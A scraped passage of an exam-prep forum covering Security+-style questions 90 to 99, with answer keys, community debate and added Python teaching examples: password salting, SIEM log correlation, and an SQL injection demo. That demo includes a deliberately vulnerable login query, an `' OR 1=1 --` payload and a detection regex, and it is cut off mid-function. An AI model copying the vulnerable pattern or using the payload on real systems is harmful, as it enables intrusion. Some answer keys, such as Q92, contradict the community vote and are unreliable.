A. Incent new hires to constantly update the document with external knowledge.

B. Publish the document in a central repository that is easily accessible to the organization.

C. Restrict eligibility to comment on the process to subject matter experts of each IT silo.

D. Rotate CIRT members to foster a shared responsibility model in the organization.

Correct Answer: D

Community vote distribution


B (61%) D (39%)

  G4ct756 Highly Voted  3 months, 2 weeks ago


Selected Answer: B
I think it is B, because there are 2 requirements: "Consistent & Auditable".
D, will foster consistent IR process, but not auditable.
B, will ensure consistency in understanding in IR process & document is auditable.
upvoted 10 times

  sterfryy Highly Voted  1 month, 3 weeks ago


The best action to foster a consistent and auditable incident response process is to publish the document in a central repository that is easily
accessible to the organization. This will ensure that all members of the organization have access to the latest version of the document and can
refer to it easily in the event of an incident. It will also enable the organization to track changes to the document over time, helping to ensure that
the incident response process remains up to date and effective.
upvoted 6 times

  sarah2023 Most Recent  1 day, 15 hours ago


Selected Answer: D
It's clearly stated in the materials provided that the answer is D
upvoted 1 times

  TinyTrexArmz 12 hours, 36 minutes ago


Maybe quote the materials you're looking at and/or provide a reference.
upvoted 1 times

  DALLASCOWBOYS 5 days, 20 hours ago


B. The only way to foster a consistent response is to publish the SOP where everyone can view the procedures. Now that doesn't mean that
everyone will follow the procedures competently. It is the BEST answer of the choices given.
upvoted 1 times

  Sandon 2 weeks ago


ChatGPT says it's B
upvoted 2 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: B
knowledge base or documentation for a consistent and auditable incident response process.
upvoted 2 times

  RvR109 2 weeks, 3 days ago


Selected Answer: B
According to ChatGPT:

B. Publish the document in a central repository that is easily accessible to the organization.

Making the incident response process document easily accessible to the entire organization is the best way to foster a consistent and auditable
incident response process. This ensures that everyone in the organization is aware of the process and is able to refer to it when needed. It also
allows for easy updates and revisions to be made as needed, and for the document to be readily available for audits.

Option A is not the best option as it could lead to a lack of consistency and understanding of the incident response process among new hires.
Option C is not the best option as it could lead to siloed knowledge and inefficiency in incident response.
Option D is not the best option as it does not ensure that everyone in the organization is aware of the incident response process and could lead
to lack of consistency."
upvoted 2 times

  asum 2 weeks, 3 days ago

Selected Answer: D
Incident response will typically require
24/7 availability, which will be expensive to provide. It is also worth considering that
members of the CIRT should be rotated periodically to preclude the possibility of
infiltration
upvoted 1 times

  scarceanimal 14 hours, 32 minutes ago


inconsistent and not auditable since only those members will be knowledgeable of the process
upvoted 1 times

  KingDrew 3 weeks, 1 day ago


Selected Answer: B
Answer is B, because despite users there will always be that same documentation to follow.
upvoted 2 times

  LaoX 1 month ago


Selected Answer: B
I am voting B because we need to address the "consistent and auditable" process. At the Point of writing this, Options B and D have 50% votes.
Wow!
upvoted 3 times

  deeden 2 months ago


Selected Answer: B
Not sure if shared responsibility promotes consistency. In reality, it feels more like each member will have a varying sense of responsibility, and
sharing them does not help with auditing in terms of individual accountability. Shared responsibility make sense in Cloud Services, although there
is still a clear line drawn between the Provider and the Customer responsibility.

On the other hand, well documented policies and procedure ensure everyone follow the same step-by-step action repeatedly without fail, and
can be easily be audited (authoritatively) as required.
upvoted 3 times

  Blueteam 2 months, 2 weeks ago


Correct answer is B.
Centralized repository provide consistent and auditable response.
upvoted 3 times

  bengy78 2 months, 2 weeks ago


Selected Answer: D
It's D. You don't want to publish information outside of the CIRT group per CompTIA CertMaster: "You must prevent the inadvertent release of
information beyond the team authorized to handle the incident. Status and event details should be circulated on a need-to-know basis and only
to trusted parties identified on a call list."
upvoted 3 times

  Renfri 1 month, 4 weeks ago


You are thinking about the details of the incident, not the incident response procedures.
upvoted 3 times

  Jossie_C 3 months ago


D so all the response team knows how to respond.
upvoted 1 times

  comeragh 4 months, 1 week ago


Selected Answer: D
I would agree with D being the correct answer here.
upvoted 4 times

  redsidemanc2 4 months, 4 weeks ago


Selected Answer: D
Noticed no comments
upvoted 5 times

  redsidemanc2 4 months, 4 weeks ago


NIST SP 800-137 under Computer Incident Response Team (CIRT)
D is correct and only one that makes sense really
upvoted 11 times


Question #91 Topic 1

During a recent penetration test, the tester discovers large amounts of data were exfiltrated over the course of 12 months via the internet. The
penetration tester stops the test to inform the client of the findings. Which of the following should be the client's NEXT step to mitigate the issue?

A. Conduct a full vulnerability scan to identify possible vulnerabilities.

B. Perform containment on the critical servers and resources.

C. Review the firewall and identify the source of the active connection.

D. Disconnect the entire infrastructure from the internet.

Correct Answer: B

Community vote distribution


B (89%) 7%

  stoneface Highly Voted  5 months ago


Selected Answer: B
Perform containment on the critical servers and resources -> Isolation or containment is the first thing to do after an incident has been
discovered
upvoted 20 times

  tek7ila Most Recent  2 months ago


Selected Answer: B
If we follow Incident Response Process:
1) Preparation - hardening
2) Identification - detection
3) Containment :)
4) Eradication
5) Recovery
6) Lesson Learned

So it has to be CONTAINMENT :)
upvoted 4 times

  tek7ila 2 months ago


If we follow Incident Response Process:
1) Preparation - hardening
2) Identification - detection
3) Containment :)
4) Eradication
5) Recovery
6) Lesson Learned

So it has to be CONTAINMENT :)
upvoted 2 times

  Sarooor 2 months, 2 weeks ago


Selected Answer: B
Perform containment on the critical servers and resources -> Isolation or containment is the first
thing to do after an incident has been discovered.
upvoted 1 times

  Tjank 4 months, 1 week ago


Selected Answer: C
following the Incident Response process:
Preparation, Identification (detection), Containment, Eradication, Recovery, Post-Incident.
Pen Tester would be the Preparation phase ( constantly new vulnerabilities)
Identification is needed to know which systems are affected and the extent of the containment needed.
Containment is next. you use what you have identified to know if you need to segment, isolate, or even shutdown completely.
upvoted 2 times

  Tafari 4 months, 1 week ago


Selected Answer: A
He stopped so he needs to finish so all vulnerable systems are contained
upvoted 1 times

  i_bird 4 months, 1 week ago

read the question well..


it's the client that is the subject of the question, not the pen tester, and its asking for MITIGATION steps
upvoted 2 times


Question #92 Topic 1

A security analyst is designing the appropriate controls to limit unauthorized access to a physical site. The analyst has a directive to utilize the
lowest possible budget. Which of the following would BEST meet the requirements?

A. Preventive controls

B. Compensating controls

C. Deterrent controls

D. Detective controls

Correct Answer: D

Community vote distribution


C (98%)

  stoneface Highly Voted  5 months ago


Selected Answer: C
This is a confusing one - > Without thinking too much, deterrent controls seems to be less expensive

I hear you ....


upvoted 27 times

  kingsAffection 5 months ago


indeed a confusing one. but I agree deterrence will only use minimum controls to deter action.
upvoted 2 times

  banditring Highly Voted  4 months ago


Selected Answer: C
a piece of paper with a crayon that says 'STAY OUT OF HERE" is the cheapest method if you ask me
upvoted 21 times

  DALLASCOWBOYS 5 days, 20 hours ago


LOL good one.
upvoted 1 times

  sandra001 1 week, 5 days ago


as funny as this sounds, yea it is the cheapest
upvoted 2 times

  Gino_Slim 3 months, 2 weeks ago


This is the answer. Well for me at least. I wouldn't suggest you do this on the exam.
upvoted 3 times

  DALLASCOWBOYS Most Recent  5 days, 20 hours ago
C. Deterrent controls would be the least expensive option. Examples would include signage, not monitored CCTV cameras. It does not prevent,
but it may deter an attacker from taking action.
upvoted 2 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: C
deterrent control A type of security
control that discourages intrusion
attempts.
upvoted 1 times

  NovaWarrior 1 month, 2 weeks ago


Selected Answer: C
To meet the requirement of utilizing the lowest possible budget, the security analyst should consider using deterrent controls.

Deterrent controls are security measures that are designed to discourage potential attackers from attempting to gain unauthorized access to a
site. These controls typically involve visible measures such as signage, fencing, and security guards, and are intended to make it clear to
potential attackers that unauthorized access will not be tolerated. Deterrent controls are often less expensive than other types of controls, such
as preventive or detective controls, and can be an effective way to limit unauthorized access without breaking the budget.
upvoted 2 times

  Korokokokokoko 2 months, 2 weeks ago
Selected Answer: C

According to CompTIA handbooks

Deterrent—the control may not physically or logically prevent access, but psychologically discourages an attacker from attempting an intrusion.
This could include signs and warnings of legal penalties against trespass or intrusion. So this is the lowest possible budget. Also the question
specify to limit unauthorized access, not prevent it entirely.

Using Preventive controls will eliminate or reduce unauthorized access but not the lowest on these categories while detective controls doesn't
deter or prevent access but will identify and record any attempt or successful intrusion.
upvoted 2 times
  Tomtom11 3 months, 3 weeks ago
Selected Answer: D
A detective control is one that facilitates the detection of a physical security
breach. Detective controls act during an event, alerting operators to specific
conditions. Alarms are common examples of detective controls. An IDS is
an example of an IT security alarm that detects intrusions.
upvoted 1 times

  Sklark 3 months, 1 week ago
Detective controls don't prevent access to a physical site. There's no information on operators being present 24/7 and not every facility has
that. I'd be careful about reading into the question to make such assumptions on the circumstance.
upvoted 1 times

  andrizo 3 months, 3 weeks ago
Does not sound cost-effective. I would go with preventive as secondary before detective.
upvoted 1 times

  comeragh 4 months, 1 week ago
Selected Answer: C
I would go with C here also. Example: video surveillance which would be cheaper option.
upvoted 2 times

  tony9622 4 months, 1 week ago
Selected Answer: C
Option C makes sense the more I think about it. A sign that says "restricted area- Authorized personnel only" is a deterrent and could be a few
dollars to make. Correct me If I am wrong but that would be my personal choice If I was deploying deterrent controls.
upvoted 3 times

  Gravoc 4 months, 2 weeks ago
Deterrent makes sense on further thought. The question just states unauthorized access. It doesn't state the intent of any unauthorized intruders.
Deterrence is designed to reduce the occurrence of unintentional bystanders or unmotivated malicious agents from entering the site. Should the
agent be motivated enough, a preventative measure is needed. But again, the question doesn't list intentions. Therefore this method works to
limit the number of unauthorized visitors by weeding out everyone but the motivated, and the truly stupid.
upvoted 1 times

  Fitzd 4 months, 3 weeks ago
CCTV is a Detective control I guess that is why
upvoted 1 times

  _bishalk__ 4 months, 1 week ago
Nah...CCTV also acts as a Deterrent control.
upvoted 1 times

  cozzmo 4 months, 3 weeks ago
Selected Answer: C
Detective will tell you about the crime that has been committed and what is missing.
correct would be Deterrent.
upvoted 1 times

  Swarupam 4 months, 4 weeks ago
Selected Answer: C
Deterrent Controls will be the most budget friendly one.
upvoted 2 times

Question #93 Topic 1

A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has 100 databases that are on
premises. Which of the following solutions will require the LEAST management and support from the company?

A. SaaS

B. IaaS

C. PaaS

D. SDN

Correct Answer: A

Community vote distribution

A (64%) C (34%)

  Hewn Highly Voted  5 months ago
Selected Answer: A
I think this is one of those questions where real-life experience doesn't answer the question correctly here. The question seems to be focusing
more on which form of cloud computing requires the LEAST amount of management (SaaS) with the database part of the question being filler.
upvoted 27 times

  [Removed] 5 months ago
Honestly I think you're right. PaaS requires management and resource allocation, and SaaS (database software for instance) wouldn't require
nearly as much.
upvoted 3 times

  db97 4 months, 1 week ago
I agree, real-life experience says "PaaS" but theory says "SaaS" lol
upvoted 2 times

  YusufMadkour Highly Voted  5 months, 1 week ago
Selected Answer: C
If they have 100 databases they need to migrate, then they will need a Platform. I don't see how the SaaS model can help with migrating
databases to the cloud.
upvoted 17 times

  scarceanimal 14 hours, 22 minutes ago
they need to migrate the servers. the database part is there to deter you. The question also calls for the least management which Saas
answers for.
upvoted 1 times

  stoneface 5 months, 1 week ago
I concur with this - an example of a database service offered as a PaaS model is Azure SQL Database, which is a fully managed platform as a
service (PaaS). PaaS capabilities built into Azure SQL Database enable you to focus on the domain-specific database administration and
optimization activities that are critical for your business.

https://docs.microsoft.com/en-us/azure/azure-sql/database/sql-database-paas-overview?view=azuresql
upvoted 9 times

  mhmtn Most Recent  1 day, 4 hours ago
Selected Answer: A
SaaS (sometimes called cloud application services) is cloud-hosted, ready-to-use application software. Users pay a monthly or annual fee to use
a complete application from within a web browser, desktop client or mobile app. The application and all of the infrastructure required to deliver it
- servers, storage, networking, middleware, application software, data storage - are hosted and managed by the SaaS vendor.
upvoted 1 times

  DALLASCOWBOYS 5 days, 20 hours ago
C. Platform as a service. The CSP provider builds and manages the infrastructure, and offers customers an execution environment. PaaS
includes multiple infrastructure components including servers, networking equipment, operating systems, storage services, middleware and
databases.
upvoted 1 times

  applepieboy 1 week, 1 day ago
Selected Answer: A
SaaS is the format that requires the least management.
upvoted 2 times

  Boubou480 4 weeks, 1 day ago
Selected Answer: A
SaaS of course
upvoted 2 times

  mike47 1 month, 2 weeks ago
Selected Answer: A
Both SaaS and PaaS management databases in the cloud. However SaaS is the easiest to maintain and manage. You can look this up on the
internet. google: SaaS vs PaaS
A. SaaS would be the correct answer.
upvoted 3 times

  jhfdkjshfkjdsho 1 month, 2 weeks ago
Selected Answer: A
There are fully managed databases on cloud like AWS RDS
upvoted 2 times

  Alizadeh 1 month, 2 weeks ago
Selected Answer: A
Of the options provided, Software as a Service (SaaS) would typically require the least management and support from the company.

SaaS is a type of cloud computing service that delivers software applications over the internet. With SaaS, the provider typically handles all
aspects of managing and maintaining the software and infrastructure, including updates, security, and scaling. This means that the company
using the SaaS service does not have to worry about managing and supporting the technology themselves.
upvoted 1 times

  rhocale 1 month, 3 weeks ago
It's SaaS because they don't want to manage it, and SaaS is used with a 3rd party.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago
Selected Answer: A
The solution that will require the LEAST management and support from the company is Software as a Service (SaaS). SaaS is a cloud computing
model in which a third-party provider delivers applications to customers over the internet. With SaaS, the provider is responsible for managing
and maintaining the servers, databases, and infrastructure, so the company doesn't have to. The other options, Infrastructure as a Service (IaaS),
Platform as a Service (PaaS), and Software-Defined Networking (SDN), all require more management and support from the company.
upvoted 2 times

  HL2020 1 month, 4 weeks ago
Selected Answer: A
The question isn't about moving the databases, it happens to say that they have 100 DBs. The question says that they are looking to migrate
SOME servers and asks which solution would require the least MGMT. It doesn't specify how many servers or what kind of servers are migrating.
With the limited knowledge of what they are doing SaaS is the answer.
upvoted 2 times

  deeden 2 months ago
Selected Answer: A
Yeah, SaaS makes sense if the company doesn't want to pay for their own DB admins. According to this link, DBaaS can be either SaaS or PaaS
depending on the solution you want to choose.
https://rockset.com/blog/what-is-a-cloud-database-iaas-paas-saas-dbaas-explained/
upvoted 2 times

  tek7ila 2 months ago
Selected Answer: A
I also would go with SaaS.
upvoted 2 times

  carpathia 2 months, 2 weeks ago
Selected Answer: C
So, my understanding is that the databases are on premises and are not to be moved, only some servers that connect to them, or probably they
mean some of those DB servers. That looks like PaaS either way.
upvoted 2 times

  M3ridi3n 2 months, 3 weeks ago
Selected Answer: A
Saas if you want LEAST management and support
upvoted 2 times

  AC1984 2 months, 3 weeks ago
Selected Answer: C
PaaS is the answer. AWS RDS, Azure SQL and GCP Cloud SQL are all managed databases (PaaS). Migrating to a managed database service is
something that requires the least amount of management.
upvoted 2 times

Question #94 Topic 1

Which of the following employee roles is responsible for protecting an organization's collected personal information?

A. CTO

B. DPO

C. CEO

D. DBA

Correct Answer: B

Community vote distribution

B (100%)

  stoneface Highly Voted  5 months, 1 week ago
Selected Answer: B
A data protection officer (DPO) is an enterprise security leadership role required by the General Data Protection Regulation (GDPR). Data
protection officers are responsible for overseeing a company's data protection strategy and its implementation to ensure compliance with GDPR
requirements
upvoted 10 times

  Boubou480 Most Recent  4 weeks, 1 day ago
Selected Answer: B
DPO is the right role
upvoted 1 times

  Sklark 3 months, 1 week ago
Selected Answer: B
You know if they would list the name of the acronym this would be an incredibly easy exam, but knowing the acronym is the answer here: Data
Protection Officer (DPO).
upvoted 2 times

  Boogie_79 5 months ago
Selected Answer: B
The answer is literally in the question DATA is the keyword!
upvoted 3 times

Question #95 Topic 1

Against the recommendation of the IT security analyst, a company set all user passwords on a server as `P@55w0rD`. Upon review of the
/etc/passwd file, an attacker found the following: alice:a8df3b6c4fd75f0617431fd248f35191df8d237f
bob:2d250c5b2976b03d757f324ebd59340df96aa05e chris:ea981ec3285421d014108089f3f3f997ce0f4150
Which of the following BEST explains why the encrypted passwords do not match?

A. Perfect forward secrecy

B. Key stretching

C. Salting

D. Hashing

Correct Answer: C

Community vote distribution

C (100%)

  Boogie_79 Highly Voted  5 months ago
Selected Answer: C
Salting refers to adding random data to the input of a hash function to guarantee a unique output. The set password, in this case, is already
hashed so to further secure it salting is the next step in cryptography i.e. adding more security to the password. Think of it as "salt bae" making it
just that much better.
upvoted 19 times

  DALLASCOWBOYS Most Recent  5 days, 20 hours ago
C. Salting. Salts eliminate the possibility that duplicate hashes are stored for different user accounts that have the same password.
upvoted 1 times

  xxxdolorxxx 2 weeks, 1 day ago
Selected Answer: C
C all day long
upvoted 1 times

  sanlibo 2 weeks, 2 days ago
salt A security countermeasure that
mitigates the impact of a rainbow table
attack by adding a random value to
("salting") each plaintext input
upvoted 1 times

  Sklark 3 months, 1 week ago
Selected Answer: C
Haha I get that the question says "Against IT recommendations" but can you imagine a company actually setting everyone's passwords to the
same password? There would be no least privilege or admin credentials. Haha anyways the example is testing to see why hash values of the
same password would be different and that would be done by adding salt which is an arbitrary or mathematical extra something to the password
to give it a different value when hashed.
upvoted 3 times

  Libraboy 3 months, 2 weeks ago
Selected Answer: C
different passwords have different hashes but in this case, the same password is used and the only way to achieve different outcomes is by
salting...adding random data to the password (same or not) when hashing to change the stored hash value.
upvoted 1 times

  [Removed] 5 months ago
I'm no expert, but I believe the hashed passwords are actually stored in etc/shadow. Anyways, it's salting.
upvoted 3 times

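The mechanism behind the answer, as an added example that is not part of the original page or its comments: three users share `P@55w0rD`; an unsalted hash is identical for all three, while a per-user random salt gives three different stored values, which is what the question's listing shows. The values in the question are 40 hex digits, i.e. SHA-1 sized, so SHA-1 is used here only to mirror that; the `user:$salt$hash` record layout, the salts, and the PBKDF2 parameters are this example's own assumptions. On a modern Linux host the hashes live in /etc/shadow rather than /etc/passwd.

```python
"""Salting demo: why the same password hashes to different values per user.

Added example, not code from the original page. SHA-1 is used only because the
40-hex-digit values in the question are SHA-1 sized; do not deploy SHA-1 for
passwords. The `user:$salthex$hash` layout below is an assumed, simplified format.
"""
import hashlib
import hmac
import os
from typing import Optional

PASSWORD = "P@55w0rD"            # the single password the company set for everyone
USERS = ("alice", "bob", "chris")


def unsalted_sha1(password: str) -> str:
    """Unsalted scheme: identical passwords give identical, rainbow-table-able hashes."""
    return hashlib.sha1(password.encode()).hexdigest()


def salted_sha1(password: str, salt: bytes) -> str:
    """Salted scheme: a per-user random salt is mixed in before hashing."""
    return hashlib.sha1(salt + password.encode()).hexdigest()


def make_record(user: str, password: str, salt: Optional[bytes] = None) -> str:
    """Build an assumed `user:$salthex$hash` record with a fresh 16-byte salt."""
    salt = os.urandom(16) if salt is None else salt
    return f"{user}:${salt.hex()}${salted_sha1(password, salt)}"


def verify_record(record: str, candidate: str) -> bool:
    """Recompute the hash from the stored salt; compare in constant time."""
    _user, _, rest = record.partition(":")
    _empty, salt_hex, stored = rest.split("$")
    computed = salted_sha1(candidate, bytes.fromhex(salt_hex))
    return hmac.compare_digest(computed, stored)


def stretched(password: str, salt: bytes, rounds: int = 100_000) -> str:
    """Salting plus key stretching (PBKDF2-HMAC-SHA256): the deployable version."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds).hex()


def shared_password_listing(salted: bool) -> dict:
    """Return {user: stored hash} for the three users who all have PASSWORD."""
    if not salted:
        return {u: unsalted_sha1(PASSWORD) for u in USERS}
    return {u: make_record(u, PASSWORD).split("$")[2] for u in USERS}


if __name__ == "__main__":
    for label, salted in (("unsalted", False), ("salted", True)):
        for user, h in shared_password_listing(salted).items():
            print(f"{label:8} {user}:{h}")
```

Without a salt every user's line would carry the same digest, and one precomputed table would crack all of them at once; with a salt the attacker has to attack each record separately, and key stretching (the PBKDF2 variant) makes each attempt expensive on top of that.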
Question #96 Topic 1

After gaining access to a dual-homed (i.e., wired and wireless) multifunction device by exploiting a vulnerability in the device's firmware, a
penetration tester then gains shell access on another networked asset. This technique is an example of:

A. privilege escalation.

B. footprinting.

C. persistence.

D. pivoting.

Correct Answer: D

Community vote distribution

D (100%)

  stoneface Highly Voted  5 months ago
Selected Answer: D
Pivoting -> The act of an attacker moving from one compromised system to one or more other systems on the network
upvoted 24 times

  xxxdolorxxx Most Recent  2 weeks, 1 day ago
Selected Answer: D
Pivoting is correct.
upvoted 2 times

  Idkanything 2 months, 1 week ago
Why not privilege escalation?
upvoted 1 times

  applepieboy 1 week, 1 day ago
Nothing in the question implies the level of access the attacker has. They do however pivot to another device.
upvoted 2 times

  xxxdolorxxx 1 week, 5 days ago
Priv Esc is more on the same machine. Going from a user to root.
upvoted 2 times

  Jossie_C 3 months ago
Selected Answer: D
Lateral movement AKA pivoting
upvoted 2 times

  EDSAL 4 months, 3 weeks ago
answer is D Pivoting
upvoted 2 times

Question #97 Topic 1

Which of the following should be monitored by threat intelligence researchers who search for leaked credentials?

A. Common Weakness Enumeration

B. OSINT

C. Dark web

D. Vulnerability databases

Correct Answer: C

Community vote distribution

C (100%)

  scarceanimal 14 hours, 8 minutes ago
Selected Answer: C
C wouldn't help too much at all really, but its the best choice lol.
upvoted 1 times

  hieptran 3 weeks, 3 days ago
Selected Answer: C
C fo sho
upvoted 1 times

  Arcd3746 2 months ago
Selected Answer: C
There's no better choice
upvoted 1 times

  Mewchan 4 months, 3 weeks ago
Selected Answer: C
Darkweb
https://www.hackers-arise.com/post/open-source-intelligence-osint-finding-breached-email-addresses-passwords-and-other-credentials
upvoted 3 times

Question #98 Topic 1

A security analyst needs to be able to search and correlate logs from multiple sources in a single tool. Which of the following would BEST allow a
security analyst to have this ability?

A. SOAR

B. SIEM

C. Log collectors

D. Network-attached storage

Correct Answer: B

Community vote distribution

B (100%)

  Gravoc Highly Voted  4 months, 2 weeks ago
Every single time I've seen the word correlate in questions, the answer has always been SIEM.

From google:

SIEM event correlation is an essential part of any SIEM solution. It aggregates and analyzes log data from across your network applications,
systems, and devices, making it possible to discover security threats and malicious patterns of behaviors that otherwise go unnoticed and can
lead to compromise or data loss.
upvoted 10 times

  RonWonkers Highly Voted  4 months, 3 weeks ago
Selected Answer: B
I believe it is SIEM
upvoted 5 times

  DALLASCOWBOYS 5 days, 19 hours ago
B. SIEM. This describes exactly what a SIEM does and is.
upvoted 1 times

  rhocale 1 month, 3 weeks ago
This would not be SOAR just because they don't want security prevention or automation, correct? Someone explain why not SOAR.
upvoted 1 times

  Yebby 2 months ago
SIEM - Security Information and Event Management
upvoted 2 times

  Knowledge33 3 months, 1 week ago
Selected Answer: B
Log collectors are pieces of software that function to gather data from multiple independent sources and feed it into a unified source such as a
SIEM. Log collectors only collects the logs. SIEM store all logs
upvoted 3 times

  Fitzd 4 months, 3 weeks ago
SIEM has log repository and analysis capabilities that SOAR platforms typically do not. The SOAR has response capabilities that the SIEM does
not
upvoted 3 times

  scarceanimal 14 hours, 5 minutes ago
yep they're commonly used in conjunction for that reason.
upvoted 1 times

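What "search and correlate logs from multiple sources in a single tool" looks like in practice, as an added example that is not part of the original page or its comments: a firewall log in key=value form and an sshd authentication log in syslog form are parsed into one common schema, and a correlation rule fires when a source IP accumulates three failed logins followed by a success within five minutes, with the firewall's view of that IP attached as context. Every log line here is constructed; the field names, the rule threshold and the year assumed for the syslog timestamps (syslog omits it) are this example's own choices, not those of any particular SIEM.

```python
"""Minimal SIEM-style correlation across two log sources.

Added example, not code from the original page. The log lines below are
constructed; the schema and the rule are this example's assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall log (key=value) and sshd log (syslog) covering the same host.
FW_LOGS = [
    "2023-02-04T07:01:10Z action=deny src=203.0.113.7 dst=10.10.1.1 dport=22",
    "2023-02-04T07:01:12Z action=allow src=203.0.113.7 dst=10.10.1.1 dport=22",
    "2023-02-04T07:05:00Z action=allow src=198.51.100.9 dst=10.10.1.1 dport=22",
]
AUTH_LOGS = [
    "Feb  4 07:01:13 web01 sshd[4122]: Failed password for root from 203.0.113.7 port 51022 ssh2",
    "Feb  4 07:01:15 web01 sshd[4122]: Failed password for root from 203.0.113.7 port 51022 ssh2",
    "Feb  4 07:01:17 web01 sshd[4122]: Failed password for root from 203.0.113.7 port 51022 ssh2",
    "Feb  4 07:01:20 web01 sshd[4130]: Accepted password for root from 203.0.113.7 port 51030 ssh2",
    "Feb  4 07:05:02 web01 sshd[4140]: Accepted publickey for deploy from 198.51.100.9 port 40110 ssh2",
]

FW_RE = re.compile(
    r"^(?P<ts>\S+) action=(?P<action>\w+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)$"
)
AUTH_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)"
)


def parse_firewall(line: str):
    """Normalise one firewall line into the common event schema (or None)."""
    m = FW_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "source": "firewall",
        "src": m["src"],
        "event": f"fw.{m['action']}",
        "user": None,
    }


def parse_sshd(line: str, year: int = 2023):
    """Normalise one sshd line; syslog omits the year, so it is assumed."""
    m = AUTH_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{m['mon']} {m['day']} {m['time']} {year}", "%b %d %H:%M:%S %Y")
    return {
        "ts": ts,
        "source": "sshd",
        "src": m["src"],
        "event": "auth.success" if m["result"] == "Accepted" else "auth.fail",
        "user": m["user"],
    }


def normalize(fw_lines, auth_lines):
    """Merge both sources into one time-ordered stream (the 'single tool' view)."""
    events = [e for e in map(parse_firewall, fw_lines) if e]
    events += [e for e in map(parse_sshd, auth_lines) if e]
    return sorted(events, key=lambda e: e["ts"])


def correlate(events, threshold: int = 3, window: timedelta = timedelta(minutes=5)):
    """Rule: >= threshold auth failures from one IP followed by a success inside window."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        fails = []
        for e in evs:
            if e["event"] == "auth.fail":
                fails.append(e["ts"])
            elif e["event"] == "auth.success":
                recent = [t for t in fails if e["ts"] - t <= window]
                if len(recent) >= threshold:
                    alerts.append({
                        "rule": "brute-force-then-success",
                        "src": src,
                        "user": e["user"],
                        "failures": len(recent),
                        "first_failure": recent[0],
                        "success": e["ts"],
                        # the firewall's view of the same IP is the corroborating context
                        "firewall_events": [x["event"] for x in evs if x["source"] == "firewall"],
                    })
                fails = []
    return alerts


if __name__ == "__main__":
    for alert in correlate(normalize(FW_LOGS, AUTH_LOGS)):
        print(alert)
```

Neither source alone tells the story: the firewall only shows port 22 being opened to the IP, and sshd only shows logins. Normalising both to one schema keyed on the source address is what lets the rule join them, which is the capability the question is asking about; a log collector on its own stops at the "collect" step.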
Question #99 Topic 1

A security analyst is investigating suspicious traffic on the web server located at IP address 10.10.1.1. A search of the WAF logs reveals the
following output:

Which of the following is MOST likely occurring?

A. XSS attack

B. SQLi attack

C. Replay attack

D. XSRF attack

Correct Answer: B

Community vote distribution

B (100%)

  comeragh Highly Voted  5 months ago
Selected Answer: B
SQLi - the giveaway is 1=1
upvoted 13 times

  xxxdolorxxx 2 weeks, 1 day ago
You are correct.
upvoted 1 times

  rodwave Highly Voted  2 months, 3 weeks ago
Selected Answer: B
Answer: SQLi attack

SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for backend database manipulation to access
information that was not intended to be displayed. The giveaway here is the 1=1 in the query which is essentially creating a condition that will
automatically be true.
======================
Helpful Info:
XSS (Cross-Site Scripting) attacks -a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
Replay Attack - a kind of man-in-the-middle attack in which an attacker sniffs messages being sent on a channel to intercept them and resend
them under the cloak of authentic messages.
CSRF (Cross Site Request Forgery) - attacks that target functionality that causes a state change on the server, such as changing the victim's email
address or password, or purchasing something.
upvoted 7 times

  DALLASCOWBOYS Most Recent  5 days, 19 hours ago
SQLi. Key is the 1=1 is the dead giveaway for the SQL injection attack
upvoted 1 times

  hieptran 3 weeks, 3 days ago
Selected Answer: B
B - Typical SQL Injection payload
upvoted 1 times

  Queenica 2 months, 1 week ago
I selected SQL Injection. However every SQL Statement Query starts with SELECT which is missing. Confused with the wording of the question.
upvoted 1 times

  RonWonkers 4 months, 3 weeks ago
Selected Answer: B
1=1 so its SQLi
upvoted 2 times

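The `1=1` tautology the comments point to, shown end to end as an added example that is not part of the original page or its comments: a login query built by string concatenation is run against an in-memory SQLite table with the payload `' OR 1=1 --`, the parameterized version of the same query is run with the same input, and a pattern check of the kind a WAF applies to request paths is run over constructed log entries. The table, its rows, the request paths and the detection regex are all this example's own constructions, not the WAF output the question refers to.

```python
"""SQL injection: vulnerable vs parameterized query, plus a WAF-style check.

Added example, not code from the original page. All data is constructed.
"""
import re
import sqlite3
from urllib.parse import unquote_plus

PAYLOAD = "' OR 1=1 --"   # closes the string, adds an always-true clause, comments out the rest


def setup() -> sqlite3.Connection:
    """Constructed users table in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "h-alice"), ("bob", "h-bob"), ("chris", "h-chris")],
    )
    return conn


def login_vulnerable(conn, username: str, password_hash: str):
    """Deliberately vulnerable: input is spliced into SQL text, so quotes change the query."""
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password_hash = '{password_hash}'"
    )
    return sorted(row[0] for row in conn.execute(sql))


def login_parameterized(conn, username: str, password_hash: str):
    """Hardened: placeholders keep input as data, never as SQL syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return sorted(row[0] for row in conn.execute(sql, (username, password_hash)))


# Heuristic a WAF might apply to decoded request paths (assumed patterns, not any vendor's rules).
SQLI_RE = re.compile(
    r"(?i)(\bor\b\s+['\"]?\d+['\"]?\s*=\s*['\"]?\d+"   # OR 1=1 / OR '1'='1'
    r"|\bunion\b\s+(?:all\s+)?select\b"                # UNION SELECT
    r"|['\d)]\s*--"                                    # quote/number then a comment
    r"|;\s*(?:drop|delete|update)\b)"                  # stacked statement
)


def looks_like_sqli(request_path: str) -> bool:
    """Decode the query string first; attackers URL-encode the quotes."""
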